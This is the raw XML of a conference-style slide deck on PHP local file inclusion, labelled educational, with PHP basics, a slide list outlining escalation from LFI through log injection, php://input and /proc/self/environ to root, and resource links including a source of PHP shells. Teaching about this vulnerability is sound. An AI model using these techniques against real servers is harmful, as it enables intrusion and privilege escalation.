          <p:cNvPr id="81924" name="Picture 4" descr="http://tucsoncitizen.com/morgue/files/2008/08/l93205-1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3767" b="3767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Thanks for listening </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Get Involved with CTF Challenges  #exploit206 on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>freenode</a:t>
            </a:r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endParaRPr lang="en-US" sz="1100" dirty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Resources:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> LPE  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://news.ycombinator.com/item?id=1810291</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>http://zentrixplus.net/blog/lfi-tutorial-phpinput/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.sh3ll.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> shells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Example PHP script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"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    "http://www.w3.org/TR/html4/loose.dtd"&gt;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&lt;html&gt;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    &lt;head&gt;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        &lt;title&gt;Example&lt;/title&gt;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    &lt;/head&gt;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    &lt;body&gt;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        &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = “Hi, I’m a PHP script!”;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  echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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      ?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;/body&gt;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&lt;/html&gt;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Include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is the PHP include function?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> statement includes and evaluates the specified file.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Include/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Eval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the PHP include function?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> statement includes and evaluates the specified file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Evaluates means executes the file as PHP code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is important to understand for later.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — Evaluate a string as PHP code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Include/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Eval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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php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//include html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>doctype,header,css,etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nclude(“../header.php”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cho “this text should be in the body”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>//close body tags and html, with logos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>require(“../footer.php”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Superglobals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Several predefined variables in PHP are "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>superglobals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", which means they are available in all scopes throughout a script. There is no need to do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>global $variable;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to access them within functions or methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>superglobal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> variables are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>$GLOBALS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>$_SERVER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>$_COOKIE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>$_SESSION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>$_ENV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Request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$_GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>An associative array of variables passed to the current script via the URL parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.google.com/search?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>q=banana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000" dirty="0" smtClean="0"/>
              <a:t>Requests made in this manner are typically logged intact with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$_POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An associative array of variables passed to the current script via the HTTP POST method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Requests made in this manner are logged, but only that a POST occurs to the script, not the included parameters. (usually)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15966</TotalTime>
  <Words>1805</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>286</Paragraphs>
  <Slides>37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Median</vt:lpstr>
      <vt:lpstr>Local File Inclusion</vt:lpstr>
      <vt:lpstr>The following presentation is for Educational Purposes Only</vt:lpstr>
      <vt:lpstr>PHP Basics</vt:lpstr>
      <vt:lpstr>PHP Basics</vt:lpstr>
      <vt:lpstr>PHP Include</vt:lpstr>
      <vt:lpstr>PHP Include/Eval</vt:lpstr>
      <vt:lpstr>PHP Include/ Eval</vt:lpstr>
      <vt:lpstr>PHP Superglobals</vt:lpstr>
      <vt:lpstr>PHP Request Parameters</vt:lpstr>
      <vt:lpstr>PHP Request Parameters</vt:lpstr>
      <vt:lpstr>Local File Inclusion</vt:lpstr>
      <vt:lpstr>On the subject of User Input…</vt:lpstr>
      <vt:lpstr>Poorly designed LFI</vt:lpstr>
      <vt:lpstr>Better LFI design</vt:lpstr>
      <vt:lpstr>LFI detection bypasses</vt:lpstr>
      <vt:lpstr>Most secure LFI - Whitelisting</vt:lpstr>
      <vt:lpstr>What now?</vt:lpstr>
      <vt:lpstr>Typical Apache Log file</vt:lpstr>
      <vt:lpstr>LFI Exploit- Access Log</vt:lpstr>
      <vt:lpstr>Log Injection </vt:lpstr>
      <vt:lpstr>LFI Exploit – PHP Input</vt:lpstr>
      <vt:lpstr>So easy we almost didn’t need a talk…</vt:lpstr>
      <vt:lpstr>LFI Exploit - /proc/self/environ</vt:lpstr>
      <vt:lpstr>LFI Exploit – PHP Session</vt:lpstr>
      <vt:lpstr>LFI Exploit – Allowed Uploads</vt:lpstr>
      <vt:lpstr>Gibson Powering Up…</vt:lpstr>
      <vt:lpstr>LFI Exploit – Read Files</vt:lpstr>
      <vt:lpstr>PHP Filters LFI Use</vt:lpstr>
      <vt:lpstr>LFI Reconnaissance</vt:lpstr>
      <vt:lpstr>LFI -&gt; Root Steps</vt:lpstr>
      <vt:lpstr>So, we have many ways to get PHP level access</vt:lpstr>
      <vt:lpstr>Local Privilege Escalation</vt:lpstr>
      <vt:lpstr>Root.  It does a body good.</vt:lpstr>
      <vt:lpstr>LFI Protections</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Join us in #exploit206 on freenode</vt:lpstr>
      <vt:lpstr>Thanks!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PHP Local File Inclusion</dc:title>
  <dc:creator>Corporate Edition</dc:creator>
  <cp:lastModifiedBy>Corporate Edition</cp:lastModifiedBy>
  <cp:revision>767</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-01-25T08:01:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-02-05T10:08:45Z</dcterms:modified>
</cp:coreProperties>
</file>